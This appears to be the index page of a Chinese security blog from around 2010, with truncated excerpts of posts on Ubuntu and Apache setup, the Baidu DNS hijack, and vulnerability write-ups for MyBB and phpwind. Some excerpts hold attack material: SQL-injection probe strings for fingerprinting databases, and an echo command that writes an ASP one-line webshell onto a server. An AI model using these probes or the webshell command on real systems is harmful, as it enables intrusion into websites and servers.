本blog开放友链申请,请在此文章下评论申请
Post by mrchen, 2010-04-29, Views:信息安全相关专业网站收集
Post by mrchen, 2010-03-27, Views:ubuntu apache2配置详解(含虚拟主机配置方法)
Post by mrchen, 2010-01-16, Views:在Windows下,Apache的配置文件通常只有一个,就是httpd.conf。但我在Ubuntu Linux上用apt-get install apache2命令安装了Apache2后,竟然发现它的httpd.conf(位于/etc/apache2目录)是空的!进而发现Ubuntu的 Apache软件包的配置文件并不像Windows的那样简单,它把各个设置项分在了不同的配置文件中,看起来复杂,
ubuntu 9.10 compiz 3D特效在命令行下关閉方法(开启3D后死机)
Post by mrchen, 2010-01-15, Views:进天终于把ubuntu 9.10 桌面版安装上了,现在我就是用这个系统在写日志.
在装这个系统的时候碰到了很多问题,这里我还是给大家一个一个来讲吧.
ubuntu一直都以3D效果闻名,所以我在装好系统后就开启了 3D 特效,但是万万没有想到,就在开启"阴影"特效的同时,系统死机了 ...
强制关机,重启,一个效果,这下完了,难道让我再重新装一下系统?
百度了半天,中文论坛上搜了好久,也没有实质性的进展
ubuntu 9.10的 recovery模式 也没有 ifix选项.彻底郁闷.只好进入最后一个选项(root命令行)
...
URLUnicode编码表与ascII编码表
Post by mrchen, 2010-01-12, Views:附件一:URLUnicode表(节选,主要是非字母的字符,RFC1738)
backspace %08
tab %09
...
sql注入用到的各种语法总结(二)
Post by mrchen, 2010-01-12, Views:==============================================================================□ 检测可否注入==============================================================================http://url/xx?id=1111 and 1=1
sql注入用到的各种语法总结
Post by mrchen, 2010-01-12, Views:1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0access
...
百度域名出现问题 和twitter被攻击时手法如出一辙
Post by mrchen, 2010-01-12, Views:今天早上7时许,百度出现访问中断的情况,查询域名baidu.com的WHOIS信息后发现百度域名出现不可理解的问题。
目前Baidu.com的DNS服务器被更换,同时主域名已经被解析到一个荷兰的IP,并且访问百度旗下子域名会被跳转到雅虎的错误页面,WHOIS数据也正在不断被刷新中,目前问题并未解决,百度也并没有对此发表回应。
8:20更新:有网友曾经被定向到一个黑页“Iranian Cyber Army”上,域名被盗取或劫持的可能性相当大,不过百度如此大的请求数量是任何一个黑页服务器也无法抵御的,因此只能是访问失败。
...
MyBB 1.4 admin remote code execution vulnerability
Post by mrchen, 2010-01-12, Views:by flyh4t
team: http://www.80vul.com
date: 2010-01-10
测试版本MyBB 1.44.11
[一]漏洞分析
在index.php文件336行左右代码如下:
//index.php,336行左右
$plugins->run_hooks("index_end");
...
phpwind 7.5 Multiple Include Vulnerabilities (2010一月最新0day利用方法)
Post by mrchen, 2010-01-11, Views:phpwind 7.5 Multiple Include Vulnerabilities
一.api/class_base.php本地包含漏洞
1.描叙
api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.
2. 具体分析
api/class_base.php文件里:
function callback($mode, $method, $params) {
...
SA权限九种上传方法
Post by mrchen, 2010-01-10, Views:SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。
一、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<25%execute request("#")25%^> >d:\web\mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop "服务名"可以停掉服务。
...
phpwind又报0day。2010真是0day爆发的一年啊
Post by mrchen, 2010-01-10, Views:昨天晚上。突然有人说phpwind报0day了!邪十已经被黑。discuz 的0day刚刚过去,phpwind就跟上来了。看来0day这东西也在即时更新啊!
这个0day貌似是邪八的人发现的,然后被徒弟利用了一下,现在好像没有公开,不过邪十被黑却是事实,昨天晚上忘记截图了,今天早晨开始维护了。

Hot Articles
New Articles
- [08/28]美国往事影评、高清下载地址
- [08/28]Google Adsense西联汇款无法在官网上查询到,需要输入汇款人姓名
- [08/23]黑帽大会:十大最具威胁的黑客攻击方式
- [08/21]一些不得不看的电影
- [08/21]IBM X3650 M3服务器上RAID配置实战
- [08/18]反ISP屏蔽路由器的方法,如何对付网络尖兵
- [08/18]电信运营商部署网络尖兵让ADSL共享上网失去自由
- [08/18]电信、联通等路由器检测技术原理分析
- [08/13]武大学子在腾讯做应用安全
- [08/13]Code Injection实例【图解】
- [08/05]OSS BSS MSS 之间的关系
- [07/17]DNS tunnel(DNS隧道)技术应用工具-DNS2tcp的使用方法及原理
- [07/02]甲方技术人员的几种类型及应对方法
- [07/02]《思科九年》(cisco 9 years)电子书PDF免注册下载地址
- [06/24]穷爸爸富爸爸中<现金流游戏>中文版下载地址
Archives
- 2011 August (11)
- 2011 July (3)
- 2011 June (7)
- 2011 May (17)
- 2011 April (11)
- 2011 March (5)
- 2011 February (14)
- 2011 January (9)
- 2010 December (20)
- 2010 November (53)
- 2010 October (32)
- 2010 September (35)
- 2010 August (16)
- 2010 July (38)
- 2010 June (78)
- 2010 May (70)
- 2010 April (73)
- 2010 March (28)
- 2010 February (3)
- 2010 January (18)
- 2009 December (21)
- 2009 November (6)
- 2009 October (3)
- 2009 September (24)
- 2009 August (16)
- 2009 July (7)
Links
Statistics
- 文章总数:618
- 评论总数:201
- 引用总数:0
- 浏览总数:253895
- 留言总数:15
- 当前主题:sean
- 当前样式:Sean_Sim
加入冠威:Admin@GuanWei.org